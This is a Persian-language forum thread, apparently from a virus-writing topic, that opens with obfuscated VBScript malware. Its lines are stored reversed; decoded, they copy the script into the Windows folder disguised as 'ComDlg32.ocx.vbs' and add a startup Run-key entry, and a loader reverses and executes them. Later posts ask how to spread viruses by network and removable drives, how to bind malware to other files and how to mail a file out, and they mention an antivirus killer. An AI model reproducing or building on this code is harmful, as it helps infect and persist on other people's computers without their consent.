' Method by KaGara'' In [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]''txen emuser rorre no')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = OSF tes')redloFswodniW(redloFlaicepSteG.OSF = riDypoC'"sbv.xco.23glDmoC\" + riDypoC = htaPV')"llehS.tpircSW"(tcejbOetaerC = llehShsW teS'"ZS_GER" ,"% " + htaPV +" exe.tpircsw" ,"23GLDMOC\nuR\noisreVtnerruC\swodniW\tfosorciM\ER AWTFOS\MLKH" etirWgeR.llehShsW'htaPV ,emaNlluFtpircS.tpircSW eliFypoC.OSFon error resume nextSet fso = CreateObject("Scripting.FileSystemObject")Set fil = fso.OpenTextFile(wscript.scriptfullname)for I=1 to 8 buf = Fil.ReadLine 'خط به خط می خونه buf2= StrReverse(buf) 'هر خط رو برعکس می کنه buf3= Mid(buf2, 1, Len(buf2)-1) ' کاراکتر اضافی "'" ته هر خط رو پاک می کنه all = all& ":" & buf3 ' تمام خطوط رو کنار هم می زارهnextfil.Close()pasargad = Mid(all, 2, len(All)-1) 'کاراکتر اول رشته رو پاک می کنهexecute(pasargad) ' رشته داده شده رو اجرا می کنه
خوب ديديد چقدر سادس!! فقط بايد بگم در vbs اگر بخوايد چندتا فرمان رو تو يه خط بنويسيد بايد اونا رو با کاراکتر ":" از هم جدا کنيد. و همچنين فرمان execute که همه اين روش ها بر مبنای اين تابع بوجود می يان٬ رشته ورودی رو که يکسری فرمان vbs بايد باشه رو اجرا می کنه مثلا Execute(" a=100: b=200: msgbox a+b")i يه مسيج باکس با متن ۳۰۰ نمايش می ده. همچنين بايد بگم تو اين روش شما نبايد در کد خودتون از فرمان execute() استفاده کنيد چون دوتا فرمان execute تو در تو باعث ايجاد خطا می شه. مثلا: execute(execute(buffer))i دستور buffer رو اجرا نخواهد کرد.
خوب ديگه خيلی طولانی شد! اما دفعه بعد با يه روش ديگه که خيلی جالبتر و علمی تر و ... تر هست در خدمتتون خواهم بود

فکر کنم مطالبت کپی پیست کردی

کاش اغلا خودت تایپ میکردی تا بفهمیم چی نوشتی

mazi_z_PSP
21-05-2007, 21:22
فکر کنم مطالبت کپی پیست کردی

کاش اغلا خودت تایپ میکردی تا بفهمیم چی نوشتی
الان هم اگه کمی به خودت زحمت بدی و مطالب رو تو Word کپی کنی و با فونت و سايزی که ميخوای تنظيم کنی بهتر ميتونی بخونی. این حرف رو قبلا هم برايه کمک به دوستان گفته بودم
البته خوشحال ميشم از انتقادادتون ميتونم با نظرات شما تاپيک رو بهتر کنم منتظر مقالات بعدی باشيد

Spy sky
26-05-2007, 14:14
با تشکر از همه ی ویروس نویس های عزیز . مقاله ها بسیار به دردم خورد.

یک پیشنهادی برای همه ی افرادی دارم که می خواهند کامپیوترشان از اینترنت آلوده نشود. به نظر من با سیستم عامل لینوکس به اینترنت وصل شوید چون از امنیت بسیار بسیار بسیار بالایی برخوردار است.

در ضمن می خواستم ببینم اینجا کسی هست که بتواند برای این سیستم عامل ویروس بنویسد ؟

با عرض سلام من می خواستم بگم که لینوکس و نرم افزار های اون و روش کارش اسون نیست که هر کسی بتونه کار کنه بعد هم این نرم افزار های که لینوکس خودش داره جامع نیست :41:

yonsen
27-05-2007, 07:06
سلام mazi_z_MCSD

چطوري ميشه با vbscript داخل فايلهاي zip rar و... . را چسجو كرد

سوال دوم هم اينكه تك تك خطوط يك فايل متني را بعنوان عناصر آرايه برگزيد

مر30 :5:

عــــلی
29-05-2007, 23:54
سلام به آقای mazi_z_MCSD امیدوارم حالتون خوب باشه من بیشتر بحص های این تاپیک رو خوندم مثل همیشه گل کاشتین دوستتون دارم فقط ممنون میشم اگه کمی در مورد آنتی ویروس نویسی علیه همین ویروسهایی که ساختین توضیح بدین خیلی ممنون فعلا خداحافظ (موفق باشید و سر بلند):40: :11:

mazi_z_PSP
30-05-2007, 10:12
سلام به آقای mazi_z_MCSD امیدوارم حالتون خوب باشه من بیشتر بحص های این تاپیک رو خوندم مثل همیشه گل کاشتین دوستتون دارم فقط ممنون میشم اگه کمی در مورد آنتی ویروس نویسی علیه همین ویروسهایی که ساختین توضیح بدین خیلی ممنون فعلا خداحافظ (موفق باشید و سر بلند):40: :11:
ممنون بيشتر از این شرمندم نکنيد. باشه درباره آنتی ويروس نويسی هم مقاله ميزارم اما نميشه رويه نوع ويروس متمرکز شد .بيشتر چيزايی ميزارم که جنبه عمومی داشته باشه. بازم ممنون .منم دوستون دارم

mazi_z_PSP
30-05-2007, 10:14
سلام mazi_z_MCSD

چطوري ميشه با vbscript داخل فايلهاي zip rar و... . را چسجو كرد

سوال دوم هم اينكه تك تك خطوط يك فايل متني را بعنوان عناصر آرايه برگزيد

مر30 :5:
شما ميتونيد در تاپيک های تکينيک برتر مثل "تمامی مسأل در ويژوال بيسيک" اونجا همه ميتونّد به شما کمک کنن.اینجا فقط مقاله گزاشته ميشه و به سوالات جزيی پاسخ داده ميشه

عــــلی
30-05-2007, 11:32
مرسي آقا مازيار خيلي باحالي:40: :11: :46:

black_storm
31-05-2007, 14:41
با پارامتر های ورودی خروجی میشه !
---------------------------------------------
Iocommand$ خیلی کار ها انجام داد

mehran8
03-06-2007, 19:53
سلام دوستان من مهران هستم عضو گروه ویروس نویسی تک ویروس !

برای کسب اطلاعات بیشتر به وبلاگ زیر مراجعه فرمایید !

برنامه در وبلاگ هست ! :46:

sina88_2004
04-06-2007, 17:11
سلام. يه بار گفتم يه بار ديه هم ميگم، كسي نميخواد راجع به راه انتشار ويروسا صحبت كنه؟

navid_ice_heart_128
17-06-2007, 01:48
سلام اين ماله منه ابته كد ريجستر رو از همين تاپيك برداشتم كسي امتحان كنه ببينه كار ميكنه فقط اگه رو ش كليك كردي زود از ريجستري پاك كنش

mazi_z_PSP
17-06-2007, 10:18
سلام اين ماله منه ابته كد ريجستر رو از همين تاپيك برداشتم كسي امتحان كنه ببينه كار ميكنه فقط اگه رو ش كليك كردي زود از ريجستري پاك كنش
دوست عزيز منظورت اینه که این يه ويروسه؟ با کد رجيستری؟ خوب مگه چيه؟ بيا منم 4تا خفنشو ساختم برات ميفرستم فقط عواقبش با خودت. بعدشم از تو رجيستری نميتونی پاکش کنی چونکه اجازه نداری

hshokhak
29-06-2007, 14:17
salam qabl az kalam
bisyar ali bod kar shoma? agar mano komak konid yak farsi saz bari photo shop bisazam, chon naw hastam ba dim site agar komak bitonid mamnon khod may sazid,
jalal_hamtah20052yahoo.com

hamidjojily
01-07-2007, 09:08
اينم اموزش تروجان نويسي كه به نوبه خود تركونده .نظر بدين

این همه دردسر ؟
توی visual basic (تو فرم لود ) بنویس " اسم برنامه/ " & shell app.path

majj
27-07-2007, 11:18
این همه دردسر ؟
توی visual basic (تو فرم لود ) بنویس " اسم برنامه/ " & shell app.path

نگفتي اگه تو يك تايمر اين رو بنويسي اون وقت چي ميشه

rouhallah
27-07-2007, 18:25
بنام خدا
من اين سوال رو تو صفحه هشتم پرسيده بودم اما كسي جواب نداد
لطفاً جواب سوالم رو بديد

ولی متوجه نشدم که برای ضمیمه کردن ویروس به یک فایل بدون تخریب اون فايل باید چه کار کرد
بلکه مهمتر از اون میخوام از این طریق بفهمم که همون طور که سورس ویروس چگونه اضافه میشه همون طور چطوری حذف میشه
با تشکر فراون

mazi_z_PSP
28-07-2007, 02:01
بنام خدا
من اين سوال رو تو صفحه هشتم پرسيده بودم اما كسي جواب نداد
لطفاً جواب سوالم رو بديد

ولی متوجه نشدم که برای ضمیمه کردن ویروس به یک فایل بدون تخریب اون فايل باید چه کار کرد
با تشکر فراون
سلام عزيز. این ويروس رو اگه با بيسيک بسازی که آزاد نيست تا موقعی که کامپايل کنی و فايل اپليکيشن رو باز کنی.من خودم از اون راهنما ساختمش مشکلی پيش نمياد.

rouhallah
28-07-2007, 13:49
سلام عزيز. این ويروس رو اگه با بيسيک بسازی که آزاد نيست تا موقعی که کامپايل کنی و فايل اپليکيشن رو باز کنی.من خودم از اون راهنما ساختمش مشکلی پيش نمياد.

دوست عزيز من ويروس خاصي نميخوام بسازم
من ميخوام بدونم كلاً چه ويروس و چه هر دستورات ديگه رو چطور به يك فايل ديگه (به انتها يا به ابتداي اون ) اضافه ميكند
به طوري كه فايل مورد نظر به خاطر اين تغيير باز هم عملكرد اصلي خودشو رو بتونه انجام بده
اون دستوري رو ميخوام كه باهاش فايلي رو براي اضافه شدن ويروس به آن فايل استفاده ميكند
اگه براتون ممكنه
اون خط از برنامه ويروس كه ويروس رو ميچسبونه به يك فايل رو برام بنويسيد
با تشكر

majj
29-07-2007, 21:32
دوست عزيز من ويروس خاصي نميخوام بسازم
من ميخوام بدونم كلاً چه ويروس و چه هر دستورات ديگه رو چطور به يك فايل ديگه (به انتها يا به ابتداي اون ) اضافه ميكند
به طوري كه فايل مورد نظر به خاطر اين تغيير باز هم عملكرد اصلي خودشو رو بتونه انجام بده
اون دستوري رو ميخوام كه باهاش فايلي رو براي اضافه شدن ويروس به آن فايل استفاده ميكند
اگه براتون ممكنه
اون خط از برنامه ويروس كه ويروس رو ميچسبونه به يك فايل رو برام بنويسيد
با تشكر

پس قصد شما چيه

sina88_2004
30-07-2007, 08:35
سلام.
من از این کد برای انتشار برنامه هام استفاده می کنم که وجود فلش درایو رو تشخیص میده.

البته از اینم برای فلاپی استفاده می کنم:

البته انام تو جنرال باید تعریف شن :

ولی انتشار از راه شبکه رو بلد نیستم. کسی میتونه کمکم کنه؟

rouhallah
30-07-2007, 14:33
پس قصد شما چيه

دوست عزيز دقيقاً درخواست من اينه
دستوري رو كه فايلي رو براي چسباندن ويروس به آن انتخاب ميكند را بنويسيد
مثلاً فرض كنيم يك سري كد نوشتيم و ميخواهيم اين كدها رو به ابتداي فايلي بچسبونيم
اون دستوري كه بايد بنويسيم تا اين كدها به فايل مورد نظر بچسبند جيست
من فقط همين رو ميخوام

اميدوارم منظورم رو فهميده باشد
با تشكر

Payman_62
31-07-2007, 19:12
دوست عزيز دقيقاً درخواست من اينه
دستوري رو كه فايلي رو براي چسباندن ويروس به آن انتخاب ميكند را بنويسيد
مثلاً فرض كنيم يك سري كد نوشتيم و ميخواهيم اين كدها رو به ابتداي فايلي بچسبونيم
اون دستوري كه بايد بنويسيم تا اين كدها به فايل مورد نظر بچسبند جيست
من فقط همين رو ميخوام

اميدوارم منظورم رو فهميده باشد
با تشكر
سلام.
شما بایندر میخوای. اینم سورسش.

BabyBoy
01-08-2007, 13:23
سلام
من یه مدت طولانی نبودم و قصد داشتم وقتی برمی گردم کل وقتمو با این تاپیک پر کنم چون احساس میکردم تو این مدت تاپیک خوبی شده باشه.
ولی به لطف بعضی ها تبدیل شده به کپی پیست شده ی وبلاگ ها و یه چیزایی شبیه چت روم یا یه چیزی تو این مایه ها.... :41:
اما چون وقتم برام مهمه ترجیه میدم به سایر تاپیک ها سر بزنم.
موفق باشید.

rouhallah
01-08-2007, 16:06
سلام.
دوست عزيز فايلي كه قرار دايد خوب دانلود نميشه لطفاً اگه براتون امكان داره جاي ديگه آپلود كنيد
با تشكر

mazi_z_PSP
01-08-2007, 22:37
سلام
من یه مدت طولانی نبودم و قصد داشتم وقتی برمی گردم کل وقتمو با این تاپیک پر کنم چون احساس میکردم تو این مدت تاپیک خوبی شده باشه.
ولی به لطف بعضی ها تبدیل شده به کپی پیست شده ی وبلاگ ها و یه چیزایی شبیه چت روم یا یه چیزی تو این مایه ها.... :41:
اما چون وقتم برام مهمه ترجیه میدم به سایر تاپیک ها سر بزنم.
موفق باشید.
سلام دوست عزيز!!!!!!!!!!1 منم کم ميام اینجا و فقط سر ميزنم ببينم آدم هايی مثل تو ميادن تو این تاپيک وقته گرانبهاشون رو تلف کنن!!
اگر دوست نداری خوب پست هم نده. منم دوست ندارم پست بدم اما اینجا به خاطره تو پست دادم تا ببينی که يکی پيدا ميشه پست هاتو بخونه.:2::18::40::11:

rezajoon2500
14-04-2008, 11:54
سلام به همه برو بچ
من می خوام بصورت حرفه ویروس نویسی کنم
ازتون کمک می خوام

rouhallah
15-04-2008, 15:52
سلام.
سلام
میدونم بعد از چند ماه اومدم دارم دوباره سوال میکنم آخه الان یه کم وقتم باز شده
میخواستم بگم این برنامه رو دانلود کردم و با ویژوال بیسیک کامپایلش کردم
اما نمیدونم چطوری ازش استفاده کنم مثلاً اون سه قسمتی که برای افزودن فایل هست رو باید چیکار کنم هر کدوم مال چیه
اگه نرفتید و هنوز فعال هستید کمک کنید

Payman_62
16-04-2008, 00:52
سلام.
2 تا فایل انتخاب کن. بعد make رو بزن تا فایل بایند شده ساخته بشه.
اینم یه بایندر دیگه بدون سورس.

ppcsoft
12-11-2008, 14:48
سلام من یه کد تو vbمیخوام که بتونه یه فایل متنی رو به ایمیلم ارسال کنه
کسی هستش من رو راهنمایی کنه؟

DJ POLESTAR
17-11-2008, 15:55
خیلی ممنون از ویروس هاتون!من هم در آینده یک ویروس در این تایپیک میزارم,البته مخربتر!!!(فعلا روش کار میکنم و 1یا2ماه دیگه با یک آموزش ویروس نویسی به وسیله Vb6 یاد می گیرید!؟!؟!

DJ POLESTAR
17-11-2008, 16:56
اينيكي McAfee-Killer هستش كه كارشو خودتون بلديد .
اگر نظر ندين و در بحث شركت نكنيد تاپيك از كار ميفته
کارت درسته ـ بابا تو دیگه کی هستی واقعا برنامه هات به دردم خورد!!!